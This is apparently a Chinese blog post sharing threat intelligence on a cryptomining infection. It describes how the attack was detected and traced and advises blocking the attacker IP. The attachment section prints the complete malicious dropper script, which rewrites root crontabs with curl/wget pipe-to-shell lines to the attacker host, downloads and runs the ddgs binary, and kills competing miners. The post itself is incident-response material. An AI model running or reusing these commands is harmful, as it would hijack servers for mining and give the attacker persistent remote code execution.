linux定时任务被挖矿修改,Linux挖矿威胁情报分享(被植入计划任务)
0、前言
咳咳,安全设备直接拉黑该IP的出入,防患于未然嘛,下文进行意识流派分析总结。
1、如何发现异常
机子异常,首先是从虚拟机管理工具发现CPU资源异常报警,判断机子里存在恶意进程占用资源。
进去机子敲打命令top查看进程资源占用top10,发现异常进程
锁定进程工作目录与恶意程序位置
删文件与Kill进程,恶意进程均死灰复燃。
脑袋一拍,随机查看计划任务。
1、计划任务
crontab -l命令查看计划任务:
curl -fsSL http://149.56.106.215:8000/i.sh | sh
wget -q -O- http://149.56.106.215:8000/i.sh | sh
3、入侵路径
1、应用漏洞
2、组件漏洞
3、系统漏洞
4、爆破
5、等等
总之,攻击者拥有了root权限写了个计划任务,攻击入口需要对相关安全日志,计划任务日志,应用服务日志等日志进行审计分析
4、大致溯源思路
1、查看crontab的日志定位最初一条计划任务执行时间
2、锁定好被植入计划任务时间,查看其他日志
3、secure可以对定位的时间查看有无爆破和异常登陆
4、web日志可以查看定位时间段内有无异常请求
5、总结
这是个情报共享,重点是IP:
149.56.106.215
拉入黑名单吧,记得出入都拉黑
6、附件
样本都在下面了,有需要自己下把
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
linux定时任务被挖矿修改,Linux挖矿威胁情报分享(被植入计划任务)相关推荐
- 应急响应--164天:挖矿脚本检测,威胁情报
挖矿前提:取得服务器权限 linux: 手动查杀:top命令看到哪个进程占用cpu最高 ,找到进程名字 使用:find / -name xxx 等待找出病毒文件路径后 记录病毒在文件夹出现的时间,重要 ...
- 【应急响应】挖矿脚本检测指南威胁情报样本定性文件清除入口修复
文章目录 挖矿样本-Win&Linux-危害&定性 Linux-Web安全漏洞导致挖矿事件 Windows-系统口令爆破导致挖矿事件 Linux-个人真实服务器被植入挖矿分析 挖矿样本 ...
- linux服务器虚拟内存设置,修改Linux服务器虚拟内存Swap大小
Linux的Swap相当于Windows的虚拟内存,当物理内存不够的时候,就需要将物理内存中的一部分空间释放出来,以供当前运行的程序使用. 那些被释放出来的空间可能来自一些很长时间没有什么操作的程序, ...
- linux内核并发教程,修改Linux内核参数提高Nginx服务器并发性能
当linux下Nginx达到并发数很高,TCP TIME_WAIT套接字数量经常达到两.三万,这样服务器很容易被拖死.事实上,我们可以简单的通过修改Linux内核参数,可以减少Nginx服务器 的TI ...
- linux时区文件命令,修改Linux时间和时区
修改Linux系统时间: 步骤一:修改Linux系统时间: linux系统时钟有两个,一个是硬件时钟,即BIOS时间,就是我们进行CMOS设置时看到的时间,另一个是系统时钟,是linux系统Kerne ...
- linux没有i18n文件,修改linux默认语言i18n
修改linux默认语言i18n 2013-03-19 i18n就是Internationalization的缩写,其原因是I和n之间一共有18个字母,人们常把I18N作为"国际化" ...
- Linux定时任务cron及部分Linux命令
cron服务¶ 在Ubuntu中,定时任务cron服务默认被安装.可以通过以下命令操作该服务: service cron status 查看服务运行状态 service cron start 启动服务 ...
- 用linux定时任务做项目对接,linux系统管理 计划任务
一次性计划任务 命令: at 语法: at [-f 文件名] 时间 绝对计时方法 HH:MM yyyy-MM-dd 相对计时方法 now + n minutes now+n hours now + n ...
- linux 脚本设置时间戳,修改linux系统时间的方法(date命令)
命令格式为: date -s 时间字符串 例如只修改系统的日期,不修改时间(时分秒) date -s 2012-08-02 或只修改时间不修改日期 date -s 10:08:00 当然也可以同时修改 ...
最新文章
- Java基础——Servlet(六)分页相关
- 国内IDC行业现状及投资策略分析
- (Hook)SetWindowsHookEx和UnhookWindowsHookEx
- redis实现购物车
- python如何入侵服务器的_通过redis入侵服务器的步骤
- 知识图谱基础知识之一——人人都能理解的知识图谱
- Go语言学习笔记(十八)之文件读写
- Linux 命令之 chmod -- 改变文件或目录权限
- Mac AndroidStudio常用快捷键
- 手把手教你用Python求最大值和最小值
- matlab优化设计大作业答案,优化设计有哪些方法(2019优化设计答案大全)
- word2vec中的数学模型
- linux中脚本后台执行的方法
- 认知差距决定我们的人生差距?!
- angular/js/vue ---表格内部换行
- 解决:log4j警告:WARN Please initialize the log4j system properly
- Naive Bayes
- velocity模板大小写转换
- 《数据结构学习笔记》-持续记录
- 敏捷观点和态度-《敏捷项目管理》读后感